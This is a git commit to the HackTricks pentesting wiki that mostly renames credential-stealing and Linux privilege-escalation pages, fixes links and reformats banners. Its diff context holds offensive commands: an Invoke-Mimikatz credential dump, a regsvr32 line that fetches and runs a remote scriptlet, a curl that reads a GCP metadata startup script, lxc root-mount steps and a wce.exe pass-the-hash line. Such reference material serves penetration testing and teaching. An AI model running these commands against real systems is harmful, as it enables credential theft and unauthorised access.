GitBook: [#3765] No subject

2023-01-24 14:43:15 +00:00 · 2023-01-24 14:43:15 +00:00 · f457b3c263
commit f457b3c263
parent 007ec71831
17 changed files with 75 additions and 93 deletions
--- a/SUMMARY.md
+++ b/SUMMARY.md
@ -103,8 +103,8 @@
  * [Logstash](linux-hardening/privilege-escalation/logstash.md)
  * [Node inspector/CEF debug abuse](linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md)
  * [D-Bus Enumeration & Command Injection Privilege Escalation](linux-hardening/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md)
-  * [Interesting Groups - Linux Privesc](linux-hardening/privilege-escalation/interesting-groups-linux-privesc/README.md)
-    * [lxd/lxc Group - Privilege escalation](linux-hardening/privilege-escalation/interesting-groups-linux-privesc/lxd-privilege-escalation.md)
+  * [Interesting Groups - Linux Privesc](linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md)
+    * [lxd/lxc Group - Privilege escalation](linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md)
  * [ld.so privesc exploit example](linux-hardening/privilege-escalation/ld.so.conf-example.md)
  * [Linux Active Directory](linux-hardening/privilege-escalation/linux-active-directory.md)
  * [Linux Capabilities](linux-hardening/privilege-escalation/linux-capabilities.md)
@ -215,13 +215,13 @@
  * [WinRM](windows-hardening/ntlm/winrm.md)
  * [WmicExec](windows-hardening/ntlm/wmicexec.md)
 * [Pivoting to the Cloud](https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-lateral-movements)
-* [Stealing Windows Credentials](windows-hardening/stealing-windows-credentials/README.md)
-  * [Windows Credentials Protections](windows-hardening/stealing-windows-credentials/windows-credentials-protections.md)
-  * [Mimikatz](windows-hardening/stealing-windows-credentials/credentials-mimikatz.md)
-* [Basic Win CMD for Pentesters](windows-hardening/basic-win-cmd-for-pentesters.md)
+* [Stealing Windows Credentials](windows-hardening/stealing-credentials/README.md)
+  * [Windows Credentials Protections](windows-hardening/stealing-credentials/credentials-protections.md)
+  * [Mimikatz](windows-hardening/stealing-credentials/credentials-mimikatz.md)
+* [Basic Win CMD for Pentesters](windows-hardening/basic-cmd-for-pentesters.md)
 * [Basic PowerShell for Pentesters](windows-hardening/basic-powershell-for-pentesters/README.md)
  * [PowerView/SharpView](windows-hardening/basic-powershell-for-pentesters/powerview.md)
-* [AV Bypass](windows-hardening/windows-av-bypass.md)
+* [AV Bypass](windows-hardening/av-bypass.md)

 ## 📱 Mobile Pentesting

--- a/forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md
+++ b/forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md
@ -204,7 +204,7 @@ The **`$BitMap`** is a special file within the NTFS file system. This file keeps
 ### ADS (Alternate Data Stream)

 Alternate data streams allow files to contain more than one stream of data. Every file has at least one data stream. In Windows, this default data stream is called `:$DATA`.\
-In this [page you can see different ways to create/access/discover alternate data streams](../../../windows-hardening/basic-win-cmd-for-pentesters.md#alternate-data-streams-cheatsheet-ads-alternate-data-stream) from the console. In the past, this cause a vulnerability in IIS as people were able to access the source code of a page by accessing the `:$DATA` stream like `http://www.alternate-data-streams.com/default.asp::$DATA`.
+In this [page you can see different ways to create/access/discover alternate data streams](../../../windows-hardening/basic-cmd-for-pentesters.md#alternate-data-streams-cheatsheet-ads-alternate-data-stream) from the console. In the past, this cause a vulnerability in IIS as people were able to access the source code of a page by accessing the `:$DATA` stream like `http://www.alternate-data-streams.com/default.asp::$DATA`.

 Using the tool [**AlternateStreamView**](https://www.nirsoft.net/utils/alternate\_data\_streams.html) you can search and export all the files with some ADS.

--- a/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md
+++ b/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md
@ -152,7 +152,7 @@ The plugin `banners.Banners` can be used in **vol3 to try to find linux banners*

 ## Hashes/Passwords

-Extract SAM hashes, [domain cached credentials](../../../windows-hardening/stealing-windows-credentials/windows-credentials-protections.md#cached-credentials) and [lsa secrets](../../../windows-hardening/authentication-credentials-uac-and-efs.md#lsa-secrets).
+Extract SAM hashes, [domain cached credentials](../../../windows-hardening/stealing-credentials/credentials-protections.md#cached-credentials) and [lsa secrets](../../../windows-hardening/authentication-credentials-uac-and-efs.md#lsa-secrets).

 {% tabs %}
 {% tab title="vol3" %}
--- a/generic-methodologies-and-resources/pentesting-methodology.md
+++ b/generic-methodologies-and-resources/pentesting-methodology.md
@ -91,7 +91,7 @@ Specially in Windows you could need some help to **avoid antiviruses**: \[Check
 If you have troubles with the shell, you can find here a small **compilation of the most useful commands** for pentesters:

 * [**Linux**](../linux-hardening/useful-linux-commands/)
-* [**Windows (CMD)**](../windows-hardening/basic-win-cmd-for-pentesters.md)
+* [**Windows (CMD)**](../windows-hardening/basic-cmd-for-pentesters.md)
 * [**Winodows (PS)**](../windows-hardening/basic-powershell-for-pentesters/)

 ### **9 -** [**Exfiltration**](exfiltration.md)
@ -108,7 +108,7 @@ You should also check this pages about how does **Windows work**:

 * [**Authentication, Credentials, Token privileges and UAC**](../windows-hardening/authentication-credentials-uac-and-efs.md)
 * How does [**NTLM works**](../windows-hardening/ntlm/)
-* How to [**steal credentials**](../windows-hardening/stealing-windows-credentials/) in Windows
+* How to [**steal credentials**](../windows-hardening/stealing-credentials/) in Windows
 * Some tricks about [_**Active Directory**_](../windows-hardening/active-directory-methodology/)

 **Don't forget to checkout the best tools to enumerate Windows and Linux local Privilege Escalation paths:** [**Suite PEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)
@ -122,7 +122,7 @@ Here you can find a [**methodology explaining the most common actions to enumera
 #### **11**.1 - Looting

 Check if you can find more **passwords** inside the host or if you have **access to other machines** with the **privileges** of your **user**.\
-Find here different ways to [**dump passwords in Windows**](../windows-hardening/stealing-windows-credentials/).
+Find here different ways to [**dump passwords in Windows**](../windows-hardening/stealing-credentials/).

 #### 11.2 - Persistence

--- a/linux-hardening/linux-privilege-escalation-checklist.md
+++ b/linux-hardening/linux-privilege-escalation-checklist.md
@ -91,7 +91,7 @@ Check out the [**top-paying bounties**](https://hackenproof.com/programs) among

 * [ ] Generic users/groups **enumeration**
 * [ ] Do you have a **very big UID**? Is the **machine** **vulnerable**?
-* [ ] Can you [**escalate privileges thanks to a group**](privilege-escalation/interesting-groups-linux-privesc/) you belong to?
+* [ ] Can you [**escalate privileges thanks to a group**](privilege-escalation/interesting-groups-linux-pe/) you belong to?
 * [ ] **Clipboard** data?
 * [ ] Password Policy?
 * [ ] Try to **use** every **known password** that you have discovered previously to login **with each** possible **user**. Try to login also without a password.
--- a/linux-hardening/privilege-escalation/README.md
+++ b/linux-hardening/privilege-escalation/README.md
@ -638,7 +638,7 @@ Now, you can execute commands on the container from this `socat` connection.

 ### Others

-Note that if you have write permissions over the docker socket because you are **inside the group `docker`** you have [**more ways to escalate privileges**](interesting-groups-linux-privesc/#docker-group). If the [**docker API is listening in a port** you can also be able to compromise it](../../network-services-pentesting/2375-pentesting-docker.md#compromising).
+Note that if you have write permissions over the docker socket because you are **inside the group `docker`** you have [**more ways to escalate privileges**](interesting-groups-linux-pe/#docker-group). If the [**docker API is listening in a port** you can also be able to compromise it](../../network-services-pentesting/2375-pentesting-docker.md#compromising).

 Check **more ways to break out from docker or abuse it to escalate privileges** in:

@ -775,8 +775,8 @@ Some Linux versions were affected by a bug that allows users with **UID > INT\_M

 Check if you are a **member of some group** that could grant you root privileges:

-{% content-ref url="interesting-groups-linux-privesc/" %}
-[interesting-groups-linux-privesc](interesting-groups-linux-privesc/)
+{% content-ref url="interesting-groups-linux-pe/" %}
+[interesting-groups-linux-pe](interesting-groups-linux-pe/)
 {% endcontent-ref %}

 ### Clipboard
@ -1500,7 +1500,7 @@ aureport --tty | grep -E "su |sudo " | sed -E "s,su|sudo,${C}[1;31m&${C}[0m,g"
 grep -RE 'comm="su"|comm="sudo"' /var/log* 2>/dev/null
 ```

-In order to **read logs the group** [**adm**](interesting-groups-linux-privesc/#adm-group) will be really helpful.
+In order to **read logs the group** [**adm**](interesting-groups-linux-pe/#adm-group) will be really helpful.

 ### Shell files

--- a/linux-hardening/privilege-escalation/interesting-groups-linux-privesc/README.md
+++ b/linux-hardening/privilege-escalation/interesting-groups-linux-privesc/README.md
@ -1,14 +1,14 @@
-# Interesting Groups - Linux PE
+# Interesting Groups - Linux Privesc

 <details>

-<summary><strong><a href="https://www.twitch.tv/hacktricks_live/schedule">🎙️ HackTricks LIVE Twitch</a> Wednesdays 5.30pm (UTC) 🎙️ - <a href="https://www.youtube.com/@hacktricks_LIVE">🎥 Youtube 🎥</a></strong></summary>
+<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).

 </details>

@ -215,12 +215,12 @@ These permissions may be abused with the following exploit to **escalate privile

 <details>

-<summary><strong><a href="https://www.twitch.tv/hacktricks_live/schedule">🎙️ HackTricks LIVE Twitch</a> Wednesdays 5.30pm (UTC) 🎙️ - <a href="https://www.youtube.com/@hacktricks_LIVE">🎥 Youtube 🎥</a></strong></summary>
+<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).

 </details>
--- a/linux-hardening/privilege-escalation/interesting-groups-linux-privesc/lxd-privilege-escalation.md
+++ b/linux-hardening/privilege-escalation/interesting-groups-linux-privesc/lxd-privilege-escalation.md
@ -1,27 +1,22 @@
-
+# lxd/lxc Group - Privilege escalation

 <details>

-<summary><strong><a href="https://www.twitch.tv/hacktricks_live/schedule">🎙️ HackTricks LIVE Twitch</a> Wednesdays 5.30pm (UTC) 🎙️ - <a href="https://www.youtube.com/@hacktricks_LIVE">🎥 Youtube 🎥</a></strong></summary>
+<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).

 </details>

-
 If you belong to _**lxd**_ **or** _**lxc**_ **group**, you can become root

-# Exploiting without internet
+## Exploiting without internet

-## Method 1
+### Method 1

 You can install in your machine this distro builder: [https://github.com/lxc/distrobuilder ](https://github.com/lxc/distrobuilder)(follow the instructions of the github):

@ -74,7 +69,7 @@ lxc exec privesc /bin/sh
 [email protected]:~# cd /mnt/root #Here is where the filesystem is mounted
 ```

-## Method 2
+### Method 2

 Build an Alpine image and start it using the flag `security.privileged=true`, forcing the container to interact as root with the host filesystem.

@ -104,7 +99,7 @@ lxc exec mycontainer /bin/sh

 Alternatively [https://github.com/initstring/lxd\_root](https://github.com/initstring/lxd\_root)

-# With internet
+## With internet

 You can follow [these instructions](https://reboare.github.io/lxd/lxd-escape.html).

@ -116,25 +111,18 @@ lxc exec test bash
 [email protected]:~# cd /mnt/root #Here is where the filesystem is mounted
 ```

-# Other Refs
+## Other Refs

 {% embed url="https://reboare.github.io/lxd/lxd-escape.html" %}

-
 <details>

-<summary><strong><a href="https://www.twitch.tv/hacktricks_live/schedule">🎙️ HackTricks LIVE Twitch</a> Wednesdays 5.30pm (UTC) 🎙️ - <a href="https://www.youtube.com/@hacktricks_LIVE">🎥 Youtube 🎥</a></strong></summary>
+<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).

 </details>
-
-
--- a/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md
+++ b/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md
@ -201,9 +201,11 @@ curl -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/ins
 # Name
 curl -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/name
 # Tags
-curl -s -f  -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/scheduling/tags
+curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/scheduling/tags
 # Zone
-curl -s -f  -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/zone
+curl -s -f -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/instance/zone
+# User data
+curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/attributes/startup-script"
 # Network Interfaces
 for iface in $(curl -s -f  -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/"); do 
    echo "  IP: "$(curl -s -f  -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/ip")
--- a/windows-hardening/active-directory-methodology/README.md
+++ b/windows-hardening/active-directory-methodology/README.md
@ -171,7 +171,7 @@ Having compromised an account is a **big step to start compromising the whole do

 Regarding [**ASREPRoast**](asreproast.md) you can now find every possible vulnerable user, and regarding [**Password Spraying**](password-spraying.md) you can get a **list of all the usernames** and try the password of the compromised account, empty passwords and new promising passwords.

-* You could use the [**CMD to perform a basic recon**](../basic-win-cmd-for-pentesters.md#domain-info)
+* You could use the [**CMD to perform a basic recon**](../basic-cmd-for-pentesters.md#domain-info)
 * You can also use [**powershell for recon**](../basic-powershell-for-pentesters/) which will be stealthier
 * You ca also [**use powerview**](../basic-powershell-for-pentesters/powerview.md) to extract more detailed information
 * Another amazing tool for recon in an active directory is [**BloodHound**](bloodhound.md). It is **not very stealthy** (depending on the collection methods you use), but **if you don't care** about that, you should totally give it a try. Find where users can RDP, find path to other groups, etc.
@ -254,7 +254,7 @@ This vulnerability allowed any authenticated user to **compromise the domain con

 Hopefully you have managed to **compromise some local admin** account using [AsRepRoast](asreproast.md), [Password Spraying](password-spraying.md), [Kerberoast](kerberoast.md), [Responder](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) including relaying, [EvilSSDP](../../generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices.md), [escalating privileges locally](../windows-local-privilege-escalation/).\
 Then, its time to dump all the hashes in memory and locally.\
-[**Read this page about different ways to obtain the hashes.**](../stealing-windows-credentials/)
+[**Read this page about different ways to obtain the hashes.**](../stealing-credentials/)

 ### Pass the Hash

@ -383,7 +383,7 @@ Once you get **Domain Admin** or even better **Enterprise Admin** privileges, yo

 [**More information about DCSync attack can be found here**](dcsync.md).

-[**More information about how to steal the NTDS.dit can be found here**](../stealing-windows-credentials/)
+[**More information about how to steal the NTDS.dit can be found here**](../stealing-credentials/)

 ### Privesc as Persistence

@ -672,7 +672,7 @@ Moreover, if the **victim mounted his hard drive**, from the **RDP session** pro

 ## Some General Defenses

-[**Learn more about how to protect credentials here.**](../stealing-windows-credentials/windows-credentials-protections.md)\
+[**Learn more about how to protect credentials here.**](../stealing-credentials/credentials-protections.md)\
 **Please, find some migrations against each technique in the description of the technique.**

 * Not allow Domain Admins to login on any other hosts apart from Domain Controllers
--- a/windows-hardening/windows-av-bypass.md
+++ b/windows-hardening/windows-av-bypass.md
--- a/windows-hardening/basic-win-cmd-for-pentesters.md
+++ b/windows-hardening/basic-win-cmd-for-pentesters.md
@ -1,14 +1,14 @@
-# Basic CMD for Pentesters
+# Basic Win CMD for Pentesters

 <details>

-<summary><strong><a href="https://www.twitch.tv/hacktricks_live/schedule">🎙️ HackTricks LIVE Twitch</a> Wednesdays 5.30pm (UTC) 🎙️ - <a href="https://www.youtube.com/@hacktricks_LIVE">🎥 Youtube 🎥</a></strong></summary>
+<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).

 </details>

@ -672,12 +672,12 @@ regsvr32 /s /u /i:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSB

 <details>

-<summary><strong><a href="https://www.twitch.tv/hacktricks_live/schedule">🎙️ HackTricks LIVE Twitch</a> Wednesdays 5.30pm (UTC) 🎙️ - <a href="https://www.youtube.com/@hacktricks_LIVE">🎥 Youtube 🎥</a></strong></summary>
+<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).

 </details>
--- a/windows-hardening/ntlm/README.md
+++ b/windows-hardening/ntlm/README.md
@ -189,7 +189,7 @@ wce.exe -s <username>:<domain>:<hash_lm>:<hash_nt>

 ## Extracting credentials from a Windows Host

-**For more information about** [**how to obtain credentials from a Windows host you should read this page**](../stealing-windows-credentials/)**.**
+**For more information about** [**how to obtain credentials from a Windows host you should read this page**](../stealing-credentials/)**.**

 ## NTLM Relay and Responder

--- a/windows-hardening/stealing-windows-credentials/README.md
+++ b/windows-hardening/stealing-windows-credentials/README.md
@ -49,7 +49,7 @@ Invoke-Mimikatz -DumpCreds #Dump creds from memory
 Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam" "lsadump::cache" "sekurlsa::ekeys" "exit"'
 ```

-[**Learn about some possible credentials protections here.**](windows-credentials-protections.md) **This protections could prevent Mimikatz from extracting some credentials.**
+[**Learn about some possible credentials protections here.**](credentials-protections.md) **This protections could prevent Mimikatz from extracting some credentials.**

 ## Credentials with Meterpreter

@ -330,7 +330,7 @@ Download it from:[ http://www.tarasco.org/security/pwdump\_7](http://www.tarasco

 ## Defenses

-[**Learn about some credentials protections here.**](windows-credentials-protections.md)
+[**Learn about some credentials protections here.**](credentials-protections.md)



--- a/windows-hardening/stealing-windows-credentials/credentials-mimikatz.md
+++ b/windows-hardening/stealing-windows-credentials/credentials-mimikatz.md
@ -2,17 +2,13 @@

 <details>

-<summary><strong><a href="https://www.twitch.tv/hacktricks_live/schedule">🎙️ HackTricks LIVE Twitch</a> Wednesdays 5.30pm (UTC) 🎙️ - <a href="https://www.youtube.com/@hacktricks_LIVE">🎥 Youtube 🎥</a></strong></summary>
+<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).

 </details>

@ -339,16 +335,12 @@ Find a domain admin credential on the box and use that token: _token::elevate /d

 <details>

